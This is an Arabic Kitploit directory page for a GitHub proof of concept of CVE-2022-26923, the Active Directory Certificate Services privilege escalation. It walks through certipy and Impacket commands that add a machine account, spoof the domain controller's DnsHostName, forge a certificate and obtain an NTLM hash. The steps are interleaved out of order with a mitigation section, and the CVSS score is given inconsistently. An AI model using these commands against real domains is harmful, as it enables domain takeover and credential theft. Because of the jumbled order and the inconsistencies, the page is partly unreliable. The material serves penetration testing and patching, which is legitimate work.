Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26923_AD-Certificate-Services — سمحت الثغرة لمستخدم بصلاحيات منخفضة بتصعيد الصلاحيات إلى مسؤول المجال في بيئة Active Directory افتراضية مع تثبيت دور خادم خدمات الشهادات في Active Directory (AD CS). | Kitploit
أدوات/GitHubGitHub/ludovicpatho/cve-2022-26923_ad-certificate-services
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقة
GitHubludovicpatho/cve-2022-26923_ad-certificate-services

CVE-2022-26923_AD-Certificate-Services

سمحت الثغرة لمستخدم بصلاحيات منخفضة بتصعيد الصلاحيات إلى مسؤول المجال في بيئة Active Directory افتراضية مع تثبيت دور خادم خدمات الشهادات في Active Directory (AD CS).

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
41142منذ 4 سنواتتمت المراجعة من قبل Kitploit

CVE-2022-26923 خدمات شهادات AD

  • تاريخ النشر : 10/05/2022
  • تعقيد الهجوم: منخفض
  • الصلاحيات المطلوبة: منخفضة
  • درجة CVSS : 8.1

أتاحت الثغرة لمستخدم ذي صلاحيات منخفضة رفع صلاحياته إلى مسؤول المجال في بيئة Active Directory افتراضية مع تثبيت دور خادم خدمات شهادات Active Directory (AD CS).

تم تطوير استغلال من قبل Oliver Lyak (ly4k_) بلغة Python وتم نشره قبل التنبيه وليس بعده. تم إعلانه كإثبات للمفهوم. الاستغلال متاح للتحميل من research.ifcr.dk.

المصدر:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
  • https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
  • https://vuldb.com/fr/?id.199368

الوصف

لم يتم بعد استغلال ثغرة رفع صلاحيات مجال Active Directory المكتشفة حديثاً في البرية، ولكن درجة CVSS العالية البالغة 8.8 تشير إلى المخاطر العالية التي تشكلها على الأنظمة المخترقة، مما يمكّن المهاجمين من إساءة استخدام مشكلات الشهادات. تسمح CVE-2022–26923 بالتلاعب بسمة DnsHostName التي تحدد اسم الكمبيوتر كما هو مسجل في DNS، ثم تمكن الخصم من الحصول على شهادة من خدمات شهادات AD، مما قد يؤدي إلى رفع الصلاحيات.

إثبات المفهوم

root@kitploit:~
    - اسم المستخدم: user_test
    - كلمة المرور: Password123#
    - المجال: my.domain.com
    
    لإعادة الإنتاج يجب عليك: 
    - تثبيت impacket و certipy على الجهاز المهاجم.
      - https://github.com/SecureAuthCorp/impacket
      - https://github.com/ly4k/Certipy
    - اختراق مستخدم ذي صلاحيات منخفضة. 
    - يكون النظام عرضة للخطر فقط إذا كانت خدمات شهادات Active Directory تعمل على المجال.
  1. لنبدأ بإنشاء شهادة لمستخدم AD ذي الصلاحيات المنخفضة (Username=user_test Password=Password123#) باستخدام قالب الشهادة User:

    root@kitploit:~
    certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
    
  2. دعنا نتحقق من أن الشهادة صالحة وأنه يمكن استخدامها لمصادقة Kerberos عبر Certipy:

    root@kitploit:~
    certipy auth -pfx user_test.pfx
    
  3. إضافة كمبيوتر افتراضي إلى المجال باستخدام Impacket:

    root@kitploit:~
    addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
    
    # my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
    # method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
    # computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
    # computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
    
  4. لنقم بإنشاء شهادة للكمبيوتر الجديد الذي أنشأناه. لاستخدام حساب الجهاز لهذا الكمبيوتر، تحتاج إلى إضافة "$" في نهاية الاسم:

    root@kitploit:~
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    
  5. على الجهاز المخترق، تحديث سمات DNS Hostname و SPN:

التخفيف والإصلاحات

للتخفيف من CVE-2022–26923 واتخاذ إجراءات وقائية، توصي Microsoft بشدة بتحديث جميع الخوادم التي تشغل خدمات شهادات AD ووحدات تحكم المجال بنظام Windows التي تعمل بمصادقة تعتمد على الشهادات إلى أحدث إصدار في 10 مايو.

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
تنزيل الأداة
root@kitploit:~
PS C:\Users\user_test> Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
  • إزالة سمة SPN الحالية:

    root@kitploit:~
    PS C:\Users\user_test> Set-ADComputer NEW_PC -ServicePrincipalName @{}
    
  • محاولة تعيين سمة اسم مضيف DNS إلى اسم وحدة التحكم بالمجال (DC):

    root@kitploit:~
    PS C:\Users\user_test> Set-ADComputer NEW_PC -DnsHostName HOSTANME.my.domain.com
    
  • على الجهاز المهاجم، تزوير شهادة خبيثة:

    root@kitploit:~
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    
  • تحقق من أن هذه الشهادة تعمل وستُرجع تجزئة NTLM:

    root@kitploit:~
    certipy auth -pfx hostname.pfx